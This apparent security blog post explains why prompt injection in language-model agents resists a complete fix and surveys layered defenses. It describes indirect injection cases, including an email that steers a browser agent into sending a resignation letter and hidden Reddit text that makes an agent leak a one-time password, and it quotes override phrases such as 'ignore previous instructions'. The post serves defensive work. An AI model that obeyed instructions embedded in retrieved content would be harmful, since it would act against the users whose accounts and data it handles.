Prompt Injection: Why It Can't Be Fixed

Prompt injection isn't a bug you patch. It's baked into how LLMs process language, and every major lab admits no complete fix exists. Here's what actually helps.

Tags: AI Security, security, prompt injection, agents, enterprise

Prompt injection is not a bug. It's a consequence of how large language models work, and every major AI lab has admitted (some more quietly than others) that no complete fix exists.

This isn't theoretical. 73% of production AI deployments are vulnerable according to OWASP's 2025 assessments. OpenAI's own red team discovered attacks where a malicious email could make their browser agent send a resignation letter instead of an out-of-office reply. Anthropic, despite achieving industry-leading defenses with Claude Opus 4.5, explicitly states that no browser agent is immune. If you're building agentic systems, this is the security reality you're operating in.

SQL Injection This Is Not

When developers first hear "prompt injection," they reach for familiar patterns. Sanitize the input. Escape special characters. Build a WAF-style blocklist.

None of that works here. SQL injection is solvable because SQL has a formal grammar. You can deterministically separate code from data using parameterized queries. The database knows the difference between SELECT * FROM users and Robert'; DROP TABLE users;-- because the syntax is unambiguous.
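The deterministic fix for SQL injection is worth seeing concretely, because it's exactly the fix that doesn't exist for prompts. A minimal sketch using Python's built-in sqlite3 (the payload string is the classic example; the table name is arbitrary):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

# Attacker-controlled input containing a classic injection payload.
name = "Robert'; DROP TABLE users;--"

# Parameterized query: the driver passes `name` as pure data.
# The payload is stored as a literal string; no SQL executes from it.
conn.execute("INSERT INTO users (name) VALUES (?)", (name,))

# The table still exists and contains the payload verbatim.
rows = conn.execute("SELECT name FROM users").fetchall()
print(rows)  # [("Robert'; DROP TABLE users;--",)]
```

The `?` placeholder works because the grammar lets the driver know, with certainty, where data ends and code begins. There is no equivalent placeholder for natural language.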

Natural language has no such grammar.

An LLM processes everything in a shared context window where instructions and data are both just tokens. The model cannot reliably distinguish "ignore previous instructions" embedded in a document from a legitimate user request, because linguistically, they're identical. You cannot sanitize natural language input without breaking the functionality that makes LLMs useful in the first place. The very capability that lets Claude understand nuanced requests also makes it susceptible to nuanced attacks.

Where the Real Attacks Happen

Direct prompt injection is what most people picture: a user typing "ignore your system prompt" into a chatbot. This is the attack you see in demos and security conference talks. It's also the least dangerous variant in production. You control the input channel. You can rate-limit users, log suspicious patterns, and deploy classifiers. The user knows they're attacking you.

Indirect injection is the production threat worth losing sleep over.

Here, malicious instructions are embedded in content the model retrieves or processes: documents, emails, web pages, tool outputs, or RAG results. Lakera documented an incident where invisible text in a Reddit post caused Perplexity's Comet agent to leak a user's one-time password. The user never typed anything malicious. They asked a question; the model retrieved a poisoned answer; the attack executed.

The attack surfaces multiply in agentic systems: every document retrieved, every email parsed, every web page browsed, and every tool output consumed is a channel an attacker can write to.

Our read: the security perimeter is no longer the model. It's every system the model touches.

Anthropic's prompt injection research represents the current state of the art. Their approach combines three layers: model training via reinforcement learning to resist injection, content classification to detect embedded commands, and continuous human red teaming to find novel attacks. The result? Claude Opus 4.5 achieved a 1% attack success rate under adversarial testing. That's a significant improvement over earlier models, but Anthropic frames it as "meaningful risk," not a solved problem.

Think about what 1% means at scale. It's a success rate per attack, not per document: if your agent encounters 10,000 injection attempts per day, roughly 100 could succeed.

If you're building a customer-facing product with millions of interactions, 1% is not a rounding error. OpenAI reached the same conclusion through different methods. After discovering multi-step injection attacks during internal red teaming, they deployed adversarially trained models with "counterfactual rollout" testing and still describe the problem as requiring continuous rather than one-time defenses. Meaningful progress is happening. Declaring victory would be premature and dangerous.

Managing What You Can't Solve

If you cannot solve prompt injection, you can still manage it. The approach that emerges from Microsoft, Anthropic, and OpenAI's research is defense-in-depth: multiple overlapping controls that limit both the probability and impact of successful attacks.

Microsoft's "spotlighting" technique uses delimiting, datamarking, and encoding to separate trusted instructions from untrusted data. The model sees clear boundaries between "this is what you should do" and "this is content you're processing." This reduces attack surface but doesn't eliminate it; sophisticated injections can mimic delimiters or exploit edge cases in encoding.

Both Anthropic and Microsoft deploy classifiers that scan for patterns suggesting embedded instructions. Microsoft's Prompt Shields integrate with Defender for Cloud; Anthropic runs content classification as a preprocessing layer. These catch known attack patterns but struggle with novel techniques. They're a necessary layer, not a sufficient one.

Some exfiltration techniques can be blocked deterministically. Microsoft specifically addresses markdown image injection, where an attacker embeds a tracking URL in generated markdown, by filtering specific patterns regardless of what the model outputs. This is the rare case where you can apply traditional security thinking: identify a specific attack class and block it at the output layer.
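A deterministic output filter of this kind is straightforward. A minimal sketch (the allowlisted host and the example output are hypothetical):

```python
import re

# Markdown image syntax: ![alt](url). An injected image pointing at an
# attacker's server can exfiltrate data via the URL's query string.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

ALLOWED_HOSTS = ("https://cdn.example.com/",)  # hypothetical allowlist

def strip_untrusted_images(model_output: str) -> str:
    """Remove markdown images unless the URL starts with an allowed host.
    Applied to the model's output regardless of what it 'intended'."""
    def keep_or_drop(m: re.Match) -> str:
        url = m.group(0).split("](", 1)[1].rstrip(")")
        return m.group(0) if url.startswith(ALLOWED_HOSTS) else ""
    return MD_IMAGE.sub(keep_or_drop, model_output)

out = "Summary done. ![x](https://evil.test/p?d=SECRET_TOKEN)"
print(strip_untrusted_images(out))  # "Summary done. "
```

Because the filter runs on output rather than trying to influence the model, it holds even when an injection succeeds upstream.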

Your agent doesn't need access to everything.

Every tool, every API endpoint, every data source expands the blast radius of a successful injection. The principle is familiar from traditional security: grant the minimum permissions necessary. If your agent only reads email, it cannot send resignation letters. If it cannot execute code, CVE-style escalations are off the table. The Lakera research notes that CVE-2025-59944 (a case sensitivity bug) escalated to remote code execution precisely because the affected system had broad tool access.
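Least-privilege tool wiring can be as simple as scoping toolboxes per task. A sketch with invented tool and task names; the point is that an injection in a read-only workflow has nothing dangerous to call:

```python
from typing import Callable

def read_email(msg_id: str) -> str: return f"<body of {msg_id}>"
def send_email(to: str, body: str) -> None: ...
def run_code(src: str) -> str: ...

# Each task gets only the tools it actually needs.
TOOLBOXES: dict[str, dict[str, Callable]] = {
    "triage_inbox": {"read_email": read_email},        # read-only
    "draft_replies": {"read_email": read_email,
                      "send_email": send_email},       # still gated below
}

def tools_for(task: str) -> dict[str, Callable]:
    # Unknown tasks get no tools at all, not a default-broad set.
    return TOOLBOXES.get(task, {})

print(sorted(tools_for("triage_inbox")))  # ['read_email']
```

The design choice worth noting: the default for an unrecognized task is an empty toolbox, so new capabilities must be granted explicitly rather than revoked after the fact.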

For sensitive actions, there is no substitute for human approval. Microsoft explicitly recommends human-in-the-loop workflows for anything with significant consequences. This breaks the "fully autonomous agent" dream but reflects reality. If the action is reversible and low-stakes, let the agent proceed. If it's sending money, deleting data, or communicating externally on someone's behalf, require approval.

Developers deploying agents today face a choice: acknowledge this risk and architect around it, or ignore it and hope. The teams taking it seriously are running threat models that include prompt injection across all input surfaces. They're deploying classifiers and monitoring for suspicious patterns. They're limiting agent capabilities to what's actually needed, requiring human approval for consequential actions, and treating their RAG corpus and tool descriptions as attack surfaces.

The teams not taking it seriously are contributing to that 73% vulnerability statistic.

The bottom line: This is a manageable risk. Defense-in-depth works. Not perfectly, but meaningfully. Assuming your model provider has solved the problem doesn't work, because they haven't. Anthropic, OpenAI, and Microsoft are all telling you the same thing: continuous vigilance, layered defenses, and honest acceptance that some residual risk will remain. Build accordingly.


Frequently Asked Questions